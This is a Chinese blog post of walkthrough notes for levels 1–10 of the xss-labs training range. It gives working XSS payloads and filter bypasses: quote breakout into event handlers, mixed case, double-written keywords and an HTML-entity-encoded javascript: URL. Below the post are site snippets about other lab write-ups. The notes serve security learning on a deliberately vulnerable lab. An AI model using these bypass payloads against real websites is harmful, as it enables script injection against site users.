Xsslabs靶场笔记Level1-10

最新推荐文章于 2024-10-08 20:13:56 发布
最新推荐文章于 2024-10-08 20:13:56 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: 学习笔记 文章标签: xss 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fish_cyy/article/details/121098793
版权

前言

仅练习了前10关,并没有详细解释如何构造payload,如有需求可参考最后的文章。

靶场下载:蓝奏云-密码blhk

正文

payload常用函数

<script>alert(1)</script>
<img src=0 onerror="javascript:alert(1)">
<a href=javascript:alert(1)></a>
onclick="alert(1)"#鼠标单击触发弹框
onfocus="alert(1)"#获得焦点弹框

Level-1

<script>alert(1)</script>

Level-2

使用第一关的语句 会发现被传输到下方的搜索框中 打开控制台看到语句 根据语句调整为

"onclick="javascript:alert(1)"

前面的双引号 是让前面语句闭合 然后传入一个事件是鼠标单击事件进行触发弹框,只需要点一下搜索框即可

Level-3

使用第二关的payload发现没用 右键查看源代码发现被转实体了

htmlspecialchars()函数 详解

>& (和号)  成为&amp;
" (双引号)  成为 &quot;
' (单引号)  成为 &#039;
< (小于)    成为 &lt;
> (大于)    成为 &gt;

发现单引号并没被过滤 使用单引号进行构造

'onclick='javascript:alert(1)'

Level-4

输入level1的payload发现尖括号被过滤 使用level2的payload

成功弹框

"onclick="javascript:alert(1)"

Level-5

on和script都被过滤 使用新的payload 也就是超链接形式

"><a href=javascript:alert(1)>

Leve6

全部被过滤 插入下划线破坏语义

这里使用大小写混淆 来构造payload

"OnClicK="javascript:alert(1)"

Level-7

过滤了on和script

采用双写进行绕过 构造payload

"oonnclick="javasscriptcript:alert(1)"

Level-8

发现大小写耶无法绕过 尝试使用编码

Unicode编码转换 - 站长工具

Level-9

插入代码 根据提示链接不合法 在后面跟加一个正确的url地址 使用//对后面进行注释

javascrip:alert(1)//http://www.baidu.com

虽然成功插入代码 但是还是无法弹框 利用编码转换一下

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://www.baidu.com

Level-10

hidden 为隐藏值 我们通过如下代码测试哪些可以被改变

?keyword=<script>alert('xss')</script>&t_link=" type="text"&t_history=" type="text"&t_sort=" type="text"

发现 t_sort被改变 以此为突破点构造xss 同时发现scrip被过滤 所以构造如下payload

1&t_sort=" type="text" onclick="alert('xss')

参考链接

具体详情可阅读此篇文章:xss-labs通关大合集_wo41ge的博客-CSDN博客_xss-labs

虹鲤鱼与律鲤鱼与驴
关注
专栏目录
xss-lab靶场level15-level20
qq_64775230的博客
06-17 305
点我进入下一关
手把手教你玩转upload-labs靶场(1--20关超详细保姆级)
weixin_52796034的博客
08-23 1012
Upload-labs靶场是一个内容全面且开源的PHP文件上传漏洞训练场所。它以真实的文件上传漏洞场景为基础,为安全研究人员和开发人员提供了一个实践和学习的平台。靶场提供了多种不同类型的漏洞场景,涵盖了文件类型绕过、文件名绕过、MIME类型绕过、大小限制绕过等多个方面。每个场景都有详细的解题思路和说明,帮助用户深入理解漏洞的原理和利用方式。通过上传恶意文件,用户可以亲身体验漏洞的利用技巧,并学习如何防范这些漏洞。Upload-labs靶场不仅提供了实践性,还提供了防御机制的实践,帮助用户全面了解如何保护系统
xss-level1
Lu__xiao的博客
02-24 4123
首先搭建xss靶场 打开浏览器输入地址来到第一关 这里我先查看了一下源代码 先试一下弹出会话框 name=<script>alert(1);</script> 可以看到直接弹出来了页面
xss-labs:level1-level10
plant1234的博客
05-06 1016
xss-labs通关 level1
XSS靶场思路讲解边练边学
最新发布
xiaoyang886_的博客
10-08 175
仅仅提供思路具体详细步骤要通过我的思路摸索尝试会比直接对着解题过程抄效率更高。希望可以给各位正在学习xss的新手一些帮助。各种函数的学习我看推荐菜鸟教程。这一关还用上一关的语句改大小写用大小写过滤。<input type="hidden" /> 隐藏域是一种在网页中不可见的表单字段。第二关有一个过滤php 的htmlspecialchars函数了解一下。xss不光会在输入框还会在请求头里burp抓包再看输入点输出点再绕过。还是用了上一关的过滤而且吧href过滤了。两个参数传值要用&连接。
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程
热门推荐
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
新手打 XSS-level(1-13) 靶场心得和总结
m0_73992753的博客
07-13 1110
新手学习 XSS-level(1-13)练级
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
2401_84297796的博客
04-26 779
作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「专栏简介」: 此文章已录入专栏。
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
XSS-labs靶场通关笔记1-3
m0_65614852的博客
03-10 367
第一关 如上图不难发现此关突破点在url中 观察url中的参数name=test,我们不妨将test更改下试试看。 你会发现在源码<h2></h2>标签外输出,因此可以利用参数name来进行操作; 构造javascript代码: <script>alert()</script> <img src="" onerror="alert()"> // onerror 当图片连接地址错误是 执行onerror事件 第.
0x01--Prime_Series_Level-1靶场
growler67
09-16 1896
001–靶场介绍 Prime是vulnhub靶场环境的一个简单的利用靶场,我们可以在vulnhub的官网里搜索到它,Prime系列共有六个靶场,本次使用的是19年出的第一个靶场环境。 介绍及下载链接:https://www.vulnhub.com/entry/prime-1,358 002–安装 靶场下载后是一个压缩文件,解压后用vm打开就行了,默认网络连接方式是nat,开机后自动获取VM虚拟网卡的dhcp地址。 查看本地的nat网段的操作如下: 003–攻击 本次环境模拟在未知具体ip地址的环境进行渗
XSS靶场——通关笔记
2301_80358831的博客
07-11 1460
通过代码发现,本关卡有两个参数:arg01、arg02,当我们发送的时候,发现他们是会互相拼接起来的,那么我们就容易想到这里会不会就是突破口,发现这两个参数是在embed上,embed标签定义嵌入的内容,并且做了尖括号过滤,那么我们可以加入一个属性进去,生成恶意代码。先查看源代码,和上一关的不同之处是t_ua处已经有了参数,虽然第四个<input>的t_ua已经有了参数,但是仍然尝试给这四个隐藏的文本框传参,结果发现t_sort成功接收到传的参,但是t_ua还是原来的参数,没有接收到刚才传的参。
xss靶场通关笔记
lizhiwei21的博客
01-27 1465
xss是指网页中嵌入客户端脚本,对客户端进行攻击,受害者为这个站点的使用用户。如果站点由后端管理员登录,那么数据就会泄露,从而造成危害。
xss靶场笔记
weixin_44664530的博客
03-10 425
1.构造xss直接过 : 2."><script>alert(1)</script>发现对 html 特殊符号进行了实体编码,
xss靶场过关随笔
qq_37953087的博客
03-17 290
这个靶场每一关的目的都已一样,在页面弹出对话框就算过关,废话少说,直接进入主题 第一关: 查看源代码,发现url里面的test就是h2标签里面的test,只需要修改 <script>alert()</script> 第二关: 将<input>提前闭合,然后插入<script> "><script>alert</script> 第三关: 简单测试一下,发现:" <>都被...
XSS跨站攻击靶场-通关笔记
weixin_30790841的博客
08-10 430
XSS攻击是Web攻击中最常见的攻击手法之一,XSS中文名跨站脚本攻击,该攻击是指攻击者在网页中嵌入恶意的客户端脚本,通常是使用JS编写的恶意代码,当正常用户访问被嵌入代码的页面时,恶意代码将会在用户的浏览器上执行,所以XSS攻击主要时针对客户端的攻击手法。 当下常见的 XSS 攻击有三种:反射型、DOM型、存储型。 其中反射型、DOM型可以归类为非持久型 XSS 攻击,存储型归类为持久...
upload-labs靶场1-21通关
08-17
要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值